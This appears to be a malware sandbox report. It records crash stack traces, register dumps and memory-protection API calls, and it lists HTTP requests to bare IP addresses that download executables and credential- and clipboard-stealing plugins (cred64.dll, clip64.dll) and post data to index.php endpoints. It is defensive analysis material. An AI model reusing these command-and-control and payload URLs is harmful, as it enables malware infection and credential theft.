DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729274ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72927610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x729b1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x729b1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x729b1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x729b416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xbb75e0
registers.esp: 2157576
registers.edi: 2157628
registers.eax: 0
registers.ebp: 2157640
registers.edx: 9203744
registers.ebx: 2158524
registers.esi: 41444732
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x783bc4
0x783ae6
0x78248b
0x7820b6
0x7805a0
0x78006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72862652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7287264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72872e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729274ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72927610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x729b1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x729b1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x729b1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x729b416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x783cb8
registers.esp: 5761748
registers.edi: 5761800
registers.eax: 0
registers.ebp: 5761812
registers.edx: 4008272
registers.ebx: 5762668
registers.esi: 42988560
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72a11194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x728e2ba1
mscorlib+0x36dd36 @ 0x71c0dd36
mscorlib+0x32fea6 @ 0x71bcfea6
mscorlib+0x30ab40 @ 0x71baab40
0x55d17a2
0x55d8764
0x55d7ee1
0x55d736e
0x787752
0x7824d5
0x7820b6
0x7805a0
0x78006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72862652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7287264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72872e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729274ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72927610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x729b1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x729b1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x729b1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x729b416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 5760792
registers.edi: 0
registers.eax: 5760792
registers.ebp: 5760872
registers.edx: 0
registers.ebx: 3991048
registers.esi: 4008272
registers.ecx: 1001821059
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72a11194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x728e2ba1
mscorlib+0x36dd51 @ 0x71c0dd51
mscorlib+0x32fea6 @ 0x71bcfea6
mscorlib+0x30ab40 @ 0x71baab40
0x55d17a2
0x55d8764
0x55d7ee1
0x55d736e
0x787752
0x7824d5
0x7820b6
0x7805a0
0x78006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72862652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7287264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72872e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729274ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72927610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x729b1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x729b1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x729b1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x729b416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 5760792
registers.edi: 0
registers.eax: 5760792
registers.ebp: 5760872
registers.edx: 0
registers.ebx: 3991048
registers.esi: 4008272
registers.ecx: 1001821059
1 0 0

__exception__

 stacktrace: 
0xc775f4
0xc77516
0xc724dd
0xc720b6
0xc705a0
0xc7006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x721c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x721d264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x721d2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722874ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72287610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72311dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72311e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72311f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7231416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc776e8
registers.esp: 2683320
registers.edi: 2683372
registers.eax: 0
registers.ebp: 2683384
registers.edx: 6957392
registers.ebx: 2684276
registers.esi: 41840460
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72371194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72242ba1
mscorlib+0x36dd51 @ 0x7156dd51
mscorlib+0x32fea6 @ 0x7152fea6
mscorlib+0x30ab40 @ 0x7150ab40
0xc7d4ea
0xc7d3dd
0xc7cb59
0xc7bf7e
0xc77c87
0xc725a5
0xc720b6
0xc705a0
0xc7006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x721c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x721d264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x721d2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722874ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72287610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72311dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72311e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72311f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7231416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73dbf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fa7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fa4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2682332
registers.edi: 0
registers.eax: 2682332
registers.ebp: 2682412
registers.edx: 0
registers.ebx: 6940168
registers.esi: 6957392
registers.ecx: 398751104
1 0 0

__exception__

 stacktrace: 
Save+0x8d733 Main-0x1371d cred64+0x91303 @ 0x7fef3261303
Save+0x8f34b Main-0x11b05 cred64+0x92f1b @ 0x7fef3262f1b
Save+0x903d3 Main-0x10a7d cred64+0x93fa3 @ 0x7fef3263fa3
Save+0x9077f Main-0x106d1 cred64+0x9434f @ 0x7fef326434f
Save+0xa0838 Main-0x618 cred64+0xa4408 @ 0x7fef3274408
Main+0x65 cred64+0xa4a85 @ 0x7fef3274a85
rundll32+0x2f42 @ 0xff322f42
rundll32+0x3b7a @ 0xff323b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 7a
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1371d cred64+0x91303
exception.address: 0x7fef3261303
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 654
registers.rbx: 0
registers.rsp: 2488544
registers.r11: 2483440
registers.r8: 0
registers.r9: 236235718666
registers.rdx: 3395056
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://193.233.20.15/dF30Hn4m/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.233.20.16/ti/truno.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.245/lebro.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.204.41.88/9vdVVVjsw/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.110.62.167/link/agent.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/lend/Underglaze.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll
request POST http://193.233.20.15/dF30Hn4m/index.php
request GET http://193.233.20.16/ti/truno.exe
request GET http://62.204.41.245/lebro.exe
request POST http://62.204.41.88/9vdVVVjsw/index.php
request GET http://79.110.62.167/link/agent.exe
request GET http://62.204.41.88/lend/Underglaze.exe
request GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll
request GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll
request GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll
request GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll
request POST http://193.233.20.15/dF30Hn4m/index.php
request POST http://62.204.41.88/9vdVVVjsw/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef4033000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 2097152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000d30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b6a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3485000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3b6b000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000bc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef34d4000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e0c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e36000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d6c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1e16000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2228
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe52d000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93e81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93d7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93dac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2228
